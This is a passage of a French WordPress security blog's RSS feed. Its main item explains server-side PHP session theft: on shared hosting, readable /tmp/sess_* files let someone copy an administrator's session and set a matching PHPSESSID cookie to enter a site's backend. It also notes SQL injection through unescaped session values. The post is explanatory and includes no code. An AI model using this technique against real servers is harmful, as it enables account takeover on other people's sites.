<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tlking.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tlking.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tlking.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tlking.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tlking.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tlking.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tlking.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tlking.wordpress.com/46/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=46&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tlking.wordpress.com/2011/09/10/webopass-bypass-faille-contournement/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2b9ac3dce6a032b77b5efbc3859b55c2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tlking</media:title>
		</media:content>
	</item>
		<item>
		<title>Vols de sessions PHP côté serveur</title>
		<link>http://tlking.wordpress.com/2011/07/07/vols-de-sessions-php-cote-serveur/</link>
		<comments>http://tlking.wordpress.com/2011/07/07/vols-de-sessions-php-cote-serveur/#comments</comments>
		<pubDate>Thu, 07 Jul 2011 10:00:25 +0000</pubDate>
		<dc:creator>TheLizardKing - tlk</dc:creator>
				<category><![CDATA[Général]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://tlking.wordpress.com/?p=30</guid>
		<description><![CDATA[On parle souvent de vols de sessions PHP lorsque on aborde une XSS, j&#8217;appellerais ça le vol de sessions côté client. Mais on parle beaucoup moins du vols de sessions PHP côté serveur. Expliquons ça. Sessions PHP ? Pour commencer il est nécessaire de savoir où et comment sont stocké ces fameuses sessions par PHP.... <a href="http://tlking.wordpress.com/2011/07/07/vols-de-sessions-php-cote-serveur/">Lire la suite.</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=30&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:justify;">On parle souvent de vols de sessions PHP lorsque on aborde une <a title="XSS" href="http://fr.wikipedia.org/wiki/Cross-site_scripting#Les_risques" target="_blank">XSS</a>, j&#8217;appellerais ça le vol de sessions côté client. Mais on parle beaucoup moins du vols de sessions PHP côté serveur. Expliquons ça.</p>
<h3 style="text-align:justify;">Sessions PHP ?</h3>
<p style="text-align:justify;">Pour commencer il est nécessaire de savoir où et comment sont stocké ces fameuses sessions par PHP. Comme vous devez déjà le savoir, les sessions sont accessible dans le code sous forme d&#8217;un tableau associatif nommé <em>$_SESSION</em> (vous pouvez essayer de faire un var_dump() sur cette variable, vous comprendrez <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> ).</p>
<p style="text-align:justify;">Pour sauvegarder les sessions, PHP va <a href="http://php.net/manual/fr/function.serialize.php">serializer </a>le tableau associatif <em>$_SESSION</em> puis l&#8217;enregistrer dans un fichier. La plus part du temps (tel que le décrit la configuration de base de PHP), ce fichier sera placé dans <em>/tmp</em> sous le nom <em>sess_{PHPSESSID}</em>. C&#8217;est à cet endroit là qu&#8217;intervient le fameux <em>PHPSESSID</em>. Le <em>PHPSESSID</em> est l’identifiant unique donné à un utilisateur du site lorsque la fonction <a href="http://www.php.net/manual/fr/function.session-start.php">session_start()</a> est appelée. Cet identifiant est stocké, la plus part du temps, dans un cookie nommé <em>PHPSESSID</em> (si si, celui que l&#8217;on récupère lors d&#8217;un vol de session côté client !).</p>
<p style="text-align:justify;">Lors du chargement d&#8217;une nouvelle page, PHP va récupérer la valeur de ce <em>PHPSESSID</em>, ouvrir le fichier <em>/tmp/sess_{PHPSESSID}</em>, passer un coup de <a href="http://php.net/manual/fr/function.unserialize.php">unserialize</a> sur le bouzin et enfin va assigner la valeur à la variable <em>$_SESSION</em>.</p>
<h3 style="text-align:justify;">Il est où le fuck ?</h3>
<p style="text-align:justify;">Bon déjà, avec ces explications on comprend mieux le pourquoi du comment du vol de session côté client.</p>
<p style="text-align:justify;">Maintenant, côté serveur, c&#8217;est extrêmement simple. Imaginons le serveur d&#8217;un hébergement mutualisé, un serveur qui donc héberge plusieurs sites en même temps, sur lequel nous avons accès en lecture et/ou écriture à tous les fichiers de la forme <em>/tmp/sess_*</em>. Vous comprenez mieux ce que je veux dire ?</p>
<p style="text-align:justify;">Tout le monde pourra créer, modifier les sessions de votre site. On imagine assez facilement un script qui va chercher dans ces fichiers si par hasard l&#8217;un d&#8217;eux contient une session d&#8217;un administrateur connecté au backend. Il lui suffirait de récupérer la valeur du fichier de session, de créer sa propre session, admettons <em>/tmp/sess_tlking</em> puis de créer le cookie nommé <em>PHPSESSID</em> et ayant pour valeur <em>tlking</em>. On se retrouverait alors connecté au backend du site. D&#8217;où le vol de session côté serveur et non client <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align:justify;">On peut aussi imaginer des injections SQL depuis les sessions. Bien souvent, on ne se soucis de passer un petit <a href="http://php.net/manual/fr/function.mysql-real-escape-string.php">mysql_real_escape_string</a> par dessus un <em>$_SESSION['id'],</em> ce qui à première vu paraît tout à fait normal !</p>
<h3 style="text-align:justify;">Sécuriser le bouzin ?</h3>
<p style="text-align:justify;">Bien bonne question&#8230; J&#8217;ai déjà cherché plusieurs solutions à ce problème. Elles existent forcement puisque j&#8217;en ai déjà vu en application. Mais où configurer cela, comment le faire, &#8230; Je n&#8217;ai malheureusement pas trouvé.</p>
<p style="text-align:justify;">Ainsi, si quelqu&#8217;un sait comment corriger ce problème, qu&#8217;il se manifeste dans les commentaires, j&#8217;éditerai de suite l&#8217;article en expliquant la solution !</p>
<p style="text-align:justify;"><strong>Je suis aussi ouvert à toute critique pour ce premier article, s&#8217;il vous a paru intéressant ou non, s&#8217;il est bourré de faute d&#8217;orthographe, tout ça tout ça <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tlking.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tlking.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tlking.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tlking.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tlking.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tlking.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tlking.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tlking.wordpress.com/30/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=30&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tlking.wordpress.com/2011/07/07/vols-de-sessions-php-cote-serveur/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2b9ac3dce6a032b77b5efbc3859b55c2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tlking</media:title>
		</media:content>
	</item>
		<item>
		<title>Ouverture !</title>
		<link>http://tlking.wordpress.com/2011/07/06/ouverture/</link>
		<comments>http://tlking.wordpress.com/2011/07/06/ouverture/#comments</comments>
		<pubDate>Wed, 06 Jul 2011 18:20:14 +0000</pubDate>
		<dc:creator>TheLizardKing - tlk</dc:creator>
				<category><![CDATA[Général]]></category>

		<guid isPermaLink="false">http://tlking.wordpress.com/?p=5</guid>
		<description><![CDATA[Salut la compagnie ! Je me suis enfin décidé à ouvrir mon blog ! Pas envie de me faire chier à gérer un hébergement tout ça tout ça, donc j&#8217;ai créer un compte sur le truc de WordPress. C&#8217;est plutôt bien foutu d&#8217;ailleurs! Sur ce blog j&#8217;aborderais principalement la sécurité informatique, surtout ce qui touche... <a href="http://tlking.wordpress.com/2011/07/06/ouverture/">Lire la suite.</a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=5&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Salut la compagnie !</p>
<p>Je me suis enfin décidé à ouvrir mon blog ! Pas envie de me faire chier à gérer un hébergement tout ça tout ça, donc j&#8217;ai créer un compte sur le truc de WordPress. C&#8217;est plutôt bien foutu d&#8217;ailleurs!</p>
<p>Sur ce blog j&#8217;aborderais principalement la sécurité informatique, surtout ce qui touche au web. Ça me m&#8217;empêchera pas de vous parler musique ou bien de tas d&#8217;autres choses!</p>
<p>En espérant que ce que je vais raconter va vous intéresser <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/tlking.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/tlking.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/tlking.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/tlking.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/tlking.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/tlking.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/tlking.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/tlking.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=tlking.wordpress.com&amp;blog=24870245&amp;post=5&amp;subd=tlking&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://tlking.wordpress.com/2011/07/06/ouverture/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2b9ac3dce6a032b77b5efbc3859b55c2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">tlking</media:title>
		</media:content>
	</item>
	</channel>
</rss>
